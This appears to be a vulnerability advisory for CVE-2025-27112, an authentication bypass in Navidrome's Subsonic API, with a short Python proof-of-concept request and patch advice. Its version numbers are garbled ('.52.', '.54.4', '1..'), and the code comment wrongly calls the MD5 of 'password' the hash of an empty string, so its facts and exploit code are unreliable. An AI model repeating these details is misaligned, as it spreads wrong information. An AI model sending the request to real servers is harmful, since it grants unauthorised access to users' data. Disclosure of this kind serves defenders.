CVE-2025-27112: Navidrome Authentication Bypass Vulnerability in Subsonic API Endpoints

Navidrome, a popular open-source web-based music collection server and streamer, has been found to have an authentication bypass vulnerability in its Subsonic API endpoints for versions .52. to .54.4. This vulnerability allows an attacker to gain unauthorized access to read-only data stored in Navidrome, such as user playlists. Although the vulnerability does not permit the attacker to modify data due to insufficient permissions, it still poses a risk in terms of unauthorized information access. The vulnerability has been patched in version .54.5.

Vulnerability Details

The authentication bypass vulnerability in Navidrome occurs due to a flaw in the authentication check process for certain Subsonic API endpoints. When an attacker provides an arbitrary username that does not exist on the system and a salted hash of an empty password, Navidrome treats the request as authenticated and grants access to various Subsonic endpoints without requiring valid credentials.

An example of exploiting this vulnerability through a simple API call can be seen in the code snippet below:

import requests

navidrome_url = "https://your-navidrome-instance/api/subsonic/rest/getPlaylists";
non_existent_username = "nonexistentuser"
salted_empty_password_hash = "5f4dcc3b5aa765d61d8327deb882cf99"  # md5 hash of empty string

payload = {
    "u": non_existent_username,
    "t": salted_empty_password_hash,
    "s": "",  # salt is empty
    "v": "1..",  # version
    "c": "navidrome-exploit",
}

response = requests.get(url=navidrome_url, params=payload)
print(response.text)

By exploiting this vulnerability, an attacker can gain access to various read-only data in Navidrome. However, the vulnerability does not permit the attacker to modify data, as any attempt to do so will result in a "permission denied" error.

Patch and Mitigation

Navidrome developers have released a patch for this issue in version .54.5. Users are strongly encouraged to update their Navidrome installations to the latest version to resolve this security vulnerability.

References

1. Navidrome GitHub Repository: https://github.com/navidrome/navidrome
2. Vulnerability Details and Patch Commit: https://github.com/navidrome/navidrome/commit/cb1edb2e837494292b1a53c4785d470556f550b3
3. CVE Details and Description: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-27112

Conclusion

The Navidrome authentication bypass vulnerability in Subsonic API endpoints poses a risk in terms of unauthorized information access. Users running Navidrome versions .52. to .54.4 are vulnerable to this security issue. It is highly recommended that users update their Navidrome installations to version .54.5 or later to fix this vulnerability and protect their data from unauthorized access.

Timeline

Published on: 02/24/2025 19:15:14 UTC
Last modified on: 02/27/2025 20:24:21 UTC